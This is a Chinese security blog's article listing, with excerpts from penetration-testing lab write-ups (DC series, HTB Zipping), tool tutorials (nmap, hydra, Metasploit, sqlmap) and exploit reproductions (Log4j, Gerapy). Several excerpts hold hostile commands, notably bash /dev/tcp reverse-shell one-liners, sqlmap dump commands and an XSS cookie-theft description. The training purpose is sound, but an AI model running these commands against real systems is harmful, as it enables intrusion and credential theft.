自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(47)
  • 收藏
  • 关注

原创 Zipping

Zipping信息收集端口扫描目录扫描webbanner信息收集漏洞利用空字节绕过---->失败sqlI-preg_match bypass反弹shell稳定维持提权-共享库漏洞参考:https://rouvin.gitbook.io/ibreakstuff/writeups/htb-season-2/zipping#sudo-privileges-greater-than-stock-binaryhttps://blog.csdn.net/qq_58869808/article/details/

2023-09-19 23:06:53 545

原创 ATK&ck靶场系列二

ATK&CK

2023-08-30 17:18:01 238

原创 DC416-dastardly

index.phpreport.php在report.php中存在xsskali起一个http服务这里应该模拟存储型XSS,靶机应该有点击留言的机制,稍几分钟后接受到Http请求,并截取到Cookie编辑admin.php的cookie后无反应,观察cookie发现是base64编码,解码出一下内容这就是admin用户index.php注入点1:时间盲注注入点2:时间盲注report.php注入点:布尔注入查找密码登录Web应用程序,并显示IRC服务器的管理

2023-04-02 18:06:02 312 1

原创 02-Breakout.zip

Vulhub,02-Breakout靶机

2023-01-18 22:01:38 92

原创 内网信息收集

内网信息收集

2022-11-19 10:16:31 704

原创 Metasploit(四)

使用MSF进行内网端口扫描将当前sessions转为后台运行设置扫描模块backgrounduse auxiliary/scanner/portscan/synset RHOSTS IPset PORTS portshttps://txluck.github.io/2022/02/05/MSF%E6%B8%97%E9%80%8F%E5%B8%B8%E7%94%A8%E6%93%8D%E4%BD%9C%E6%8C%87%E5%8D%97/#%E7%89%88%E6%9C%AC%E6%89%A

2022-09-04 19:11:39 290

原创 安全协议重点

安全协议(Security Protocols)也被称为密码协议(CryptographicProtocols),是以密码学为基础的消息交换协议,其目的是在网络环境中提供各种安全服务密码协议是使用密码技术的协议。参与该协议的伙伴可能是朋友和完全信任的,或者也可能是敌人和互相完全不信任的人密码协议包含某种密码算法,但通常,协议的目的不仅仅是为了简单的秘密性。参与协议的各方可能为了计算一个数值想共享它们的秘密部分、共同产生随机系列、确定互相的身份、或者同时签署合同。在协议中使用密码的目

2022-06-24 17:22:39 2347

原创 ATT&CK实战系列-红队实践一

靶机下载http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境配置vnet1网卡:win7:仅主机vnet1:192.168.52.143NATvnet8:192.168.124.20在C盘下运行phpstudy.win2008:仅主机IP:192.168.52.138win2k3:仅主机IP:192.168.52.141攻击机kali2019:NAT模式IP:192.168.124.26DMZ区(win7渗透)信

2022-06-12 21:45:47 1239

原创 DC-9靶机

信息收集存活主机及其端口探测nmap -sn 192.168.124.0、24nmap -sS -A 192.168.124.21目录扫描网站banner信息收集通过测试,发现sql注入漏洞利用sql注入把请求信息导出为dc9.txt,接下来用SQLmap进行遍历sqlmap -r dc9.txt接下来使用sqmap导出数据sqlmap.py -r dc9.txt ‐‐dbssqlmap.py -r dc9.txt -D users --tablessqlmap.py

2022-04-10 12:11:17 3721

原创 专业课程设2

环境配置概述内网:仅主机模式下,ubuntu20 (IP:192.168.137.128,网关:192.168.137.89,DNS:114.114.114.114)网关:centos7,双网卡NAT–ens33ip:192.168.124.139,网关:192.168.124.1,DNS:114.114.114.114HOST-Only–ens36ip:192.168.137.89,网关:192.168.137.1,DNS:114.114.114.114外网:NAT模式,kaliip:

2022-03-30 21:45:38 581

原创 DC-8靶机

环境搭建

2022-03-26 16:16:17 3349

原创 DC-7靶机

DC-7环境搭建信息收集主机发现及端口探测目录扫描网站banner信息收集反弹shell提权问题环境搭建下载链接:https://www.five86.com/downloads/DC-7.zip信息收集主机发现及端口探测1.nmap -sP 192.168.124.0/24 ---存活主机探测2.nmap -A 192.168.124.44 ---全面扫描3.nmap -sS 192.168.124.44 -p 1-65535 ---全端口扫描发现22端口,爆破ssh,不成功。hyd

2022-03-21 22:23:19 3330

原创 DC-6靶机

环境搭建下载链接:http://www.five86.com/downloads/DC-6.zip解压用VMware打开

2022-03-21 00:08:32 4133

原创 网络杂文链接

网上找到一篇Kerberos讲的特别好的,沾上链接。https://teamssix.com/210923-151418.html#toc-heading-8

2022-03-18 19:51:31 115

原创 Java反射机制

什么是反射Java反射就是在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法;对于任意一个对象,都能够调用它的任意方法和属性;并且能改变它的属性反射的作用获取java对象所属的类1、通过对象调用 getClass() 方法来获取,通常应用在:比如你传过来一个 Object类型的对象,而我不知道你具体是什么类,用这种方法  Person p1 = new Person();  Class c1 = p1.getClass();2、直接通过 类名.class 的方式得到,该方法最为安全

2022-03-18 19:25:29 496 1

原创 bat脚本学习

bat介绍批处理文件,在DOS和Windows(任意)系统中,.bat文件是可执行文件,由一系列命令构成,其中可以包含对其他程序的调用。命令学习net user—查看当前用户权限echo —输出后面内容@echo off --关闭.bat文件回显::和@REM—注释set name=1 —定义变量%name% —变量调用for %%i in (12345) do echo %%i —for循环if defined%0-%1-%2—表示本文件文件名-传给文件的参数1-传给文件的参数2

2022-03-18 17:42:24 95

原创 DC-5靶机

下载安装靶场下载地址:https://download.vulnhub.com/dc/DC-5.zip信息收集存后活主机探测nmap -sP 192.168.124.0/24端口服务探测nmap -A 192.168.124.25全端口扫描nmap -sS 192.168.124.25 -p 1-65535目录扫描python3 dirsearch.py -u http://192.168.124.25/ -e* -i 200网站服务探测猜测可能存在文件包含漏

2022-03-18 17:41:18 1328

原创 nmap使用教程

目录nmap参数**常用参数及命令:**从文件读取目标查看存活主机:扫描sql注入:漏洞扫描:端口扫描:服务探测操作系统全部扫描常见端口扫描输出文件nmap参数常用参数及命令:从文件读取目标nmap -iL <inputfilename>查看存活主机:nmap –sP 192.168.1.1/24nmap –sP baidu.com/24扫描sql注入:nmap –p 80 , 81 ip --script=http-sql-inject.nse漏洞扫描:nmap

2022-03-18 13:47:36 2714

原创 hydra使用教程

目录标题注意hydra详细使用教程hydra简介hydra常用命令hydra支持破解的服务/协议对应功能的参数模板1、破解ssh:2、破解ftp:3、get方式提交,破解web登录:4、post方式提交,破解web登录:5、破解https:6、破解teamspeak:7、破解cisco:8、破解smb:9、破解pop3:10、破解rdp:11、破解http-proxy:12、破解imap:实例演示-破解SSH密码1.使用字典对目标服务进行破解。2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。3

2022-03-14 17:28:16 3696

原创 kali的php安装xdebug问题解决

问题记录问题背景解决办法重装php7.4添加源写入源更新源安装php7.4到 Kali Linux.验证问题背景kali本身自带php7.4为php7.4.26,apt源中没有其对应的php-dev,也即没有了对应的phpize,此时装xdebug就是一个难事,因为使用apt直接装的话,是找不到对应版本的,编译源码还需要phpize.解决办法参考连接:kali安装php7.4Ubuntu 安装 PHP 及切换 PHP 版本重装php7.4添加源首先在 etc/apt/下新建一个文件夹 tru

2022-03-13 15:29:50 840

原创 PhpStorm Xdebug调试环境搭建

远程调试一,环境介绍本地主机:windows10(192.168.157.115)+ phpstorm2021.3远程:centos14.04(192.168.124.139)+ apache2 + php7二,远程环境配置安装及配置Xdebug安装教程网上已经很详细,不赘述配置php.inizend_extension=xdebug.soxdebug.idekey=PHPSTORMxdebug.remote_connect_back = 1;//如果开启此,将忽略下面的 xdebug

2022-03-12 18:04:46 1198

原创 thinkphp5RCE

这里写目录标题加载第三方类库captcha路由。非debugpayload:1.路由检测1.1跟进self::routeCheck1.2跟进Route::check1.2.1在check函数进入$request->method(),1.2.2进入method()函数1.2.3进入__construct函数1.3跟进self::checkRoute1.4 跟进self::checkRule1.5跟进self::parseRule2.路由检测后,进入self::exec函数2.1 跟进exec函数2.2R

2022-03-07 11:39:45 1670

原创 Docker命令学习

这里写目录标题Docker命令学习容器使用运行交互式容器启动容器进入容器导出和导入容器删除容器镜像使用创建镜像更新镜像构建镜像设置镜像标签推送镜像Docker容器连接网络端口映射容器互联新建网络连接容器DokerfileComposeComposeDocker命令学习容器使用运行交互式容器docker -i -t ubuntu:15.10 /bin/bash-t:在容器内指定一个终端-i:允许你对容器内的标准输入进行交互启动容器docker run -d ubuntu:15.10 bin

2022-01-10 22:01:24 484

转载 微信小程序抓包

第一步:下载burp证书双击安装点击安装证书点击下一步点击下一步就完成安装了然后打开win+r+inetcpl.cpl设置如下打开电脑微信->小程序,burp就能抓到微信小程序的包了。转载自https://blog.csdn.net/weixin_44281516/article/details/121140397?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%

2022-01-08 23:28:47 167

原创 gerapy漏洞复现(CVE-2021-43857)

简介Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。漏洞描述该漏洞源于程序没有正确清理通过project/id/parse端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。影响版本Gerapy <= 0.9.8代码分析http://www.ctfiot.com/14043.html漏洞复现开启环境弱口令:admin/admin进入后台,点击项目管理。抓包反弹shell修改请求包,反弹shell。反弹成功

2022-01-05 22:11:44 4593 1

转载 frp原理即使用教程

Frp介绍frp 是一个开源、简洁易用、高性能的内网穿透和反向代理软件,支持 tcp, udp, http, https等协议。frp 项目官网是 https://github.com/fatedier/frp,frp工作原理服务端运行,监听一个主端口,等待客户端的连接;客户端连接到服务端的主端口,同时告诉服务端要监听的端口和转发类型;服务端fork新的进程监听客户端指定的端口;外网用户连接到客户端指定的端口,服务端通过和客户端的连接将数据转发到客户端;客户端进程再将数据转发到本地服务(端口

2021-12-30 14:07:07 1798

原创 Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)

复现环境centos7(docker依赖环境),kali2019环境搭建1.使用 docker 拉取漏洞镜像docker pull vulfocus/log4j2-rce-2021-12-09:latest2.查看漏洞镜像并开启环境docker imagesdocker run -d -P vulfocus/log4j2-rce-2021-12-09docker ps -a3.访问漏洞环境,环境搭建完成http://192.168.124.139:49153漏洞复现

2021-12-25 00:53:35 5054 1

转载 云服务器使用教程

参考连接:https://blog.csdn.net/colorfulyan/article/details/112212976

2021-12-22 09:58:47 65

转载 sql注入之万能密码总结

万能密码万能密码原理原验证登陆语句:SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'即得到优先级关系:or&lt

2021-12-03 00:30:55 13945

原创 DC-4靶机

下载安装靶场下载地址:https://download.vulnhub.com/dc/DC-4.zip信息收集存后活主机探测nmap -sP 192.168.124.0/24端口服务探测nmap -sS -A 192.168.124.24目录扫描dirb http://192.168.124.24网站服务探测访问网站,发现登录框,提示admin用户登录。漏洞发现爆破密码法一:使用 BP 进行爆破密码1)准备密码本,没有可以使用 kali john工具的密码本,位置

2021-11-22 16:50:40 3700

原创 DC-3.2靶机

下载安装靶场的下载:http://www.five86.com/downloads/DC-3-2.zip信息收集存后活主机探测nmap -sP 192.168.124.0/24端口服务探测nmap -A 192.168.124.23目录扫描python3 dirsearch.py -u http://192.168.124.23/ -e* -i 200发现管理员登录界面网站服务探测访问网站网站的内容管理系统为Joomla.操作系统为Ubuntu.Joomla的版本为

2021-11-22 11:34:19 3346

原创 Metasploit(三)

辅助模块(auxiliary)使用use auxiliary/scanner/smb/smb_ms17_010查看配置show opions设置配置set lhost运行runnop模块查看模块show nops使用use nop/x86/single_byte查看配置show options设置配置set ...运行runencoder模块通过在msfconsole中查看混淆器show encoders在msfvenom和msfconso

2021-11-21 11:38:22 310

原创 DC-2靶机

下载安装DC-2用Vmware打开信息收集存后活主机探测nmap -sP 192.168.124.0/24端口服务探测nmap -A 192.168.124.155nmap -sS 192.168.124.155 -p 1-65535目录扫描python3 dirsearch.py -u http://dc-2/-e* -i 200或dirb http://dc-2/网站服务探测访问网站,发现访问不了,改以下本地DNS。Linuxvim 、/etc/hostsw

2021-11-19 21:40:25 2991

转载 反弹shell的姿势

目录自带工具BashnetcatTelnet其他工具gawkxterm常见脚本pythonPerlRubyPHPjava自带工具Bash0x01bash -i >& /dev/tcp/10.0.0.1/8080 0>&10x02exec /bin/bash 0&0 2>&00x030<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&amp

2021-11-14 22:50:54 147

原创 Linux 提权的各种姿势总结

简单shell升级位TTYshellpasswd文件提权shadow文件提权SUID提权Cron Jobs提权通配符注入提权sudo提权查找敏感文件提权跳板用户提权内核漏洞提权暴力破解自动化提权工具

2021-11-14 21:17:00 1449

原创 瑞士军刀nc

nc介绍参数介绍常见功能端口扫描常用参数用法FTP匿名探测聊天服务文件传输目录传输远程shell反向shellNC文件加密传输目标主机上没有Netcat,如何获取反向shellpython反向shellphp反向shellbash反向shellperl反向shell参考连接:https://blog.csdn.net/chenj_freedom/article/details/77099909http://codetd.com/article/6912003参数介绍连接到主机:nc[-options

2021-11-14 14:08:51 882

原创 DC-1靶机

下载DC-1需要用VMware15以上版本打开,出现报错时直接点重试。

2021-11-12 09:24:27 302

转载 linux下的/etc/passwd详解

在Linux /etc/passwd文件中每个用户都有一个对应的记录行,它记录了这个用户的一些基本属性。系统管理员经常会接触到这个文件的修改以完成对用户的管理工作。类似于下面的例子:从上面的例子我们可以看到,/etc/passwd中一行记录对应着一个用户,每行记录又被冒号(:)分隔为7个字段,其格式和具体含义如下:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell“用户名”代表用户账号的字符串。通常长度不超过8个字符,并且由大小写字母和/或数字组成。登录名中不能有冒号(??

2021-11-10 22:52:55 5238

转载 获取内核,操作系统和设备信息

获取内核,操作系统和设备信息命令作用uname -a打印所有可用的系统信息uname -r内核版本信息uname -n系统主机名字hostname主机名uname -mLinux内核架构(x86/x64)cat /proc/version内核信息cat /etc/*-release发布信息cat /etc/issue发布信息cat /proc/cpuinfoCPU信息df -a文件系统信息用户和组

2021-11-10 20:40:49 140

原创 Metasploit(二)

漏洞检测search name:0708–搜索带有0708字样的模块use exploit模块 --使用模块show options – 查看配置set … – 设置配置check --漏洞检测use – 使用exploit模块攻击

2021-11-10 20:27:11 6861

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除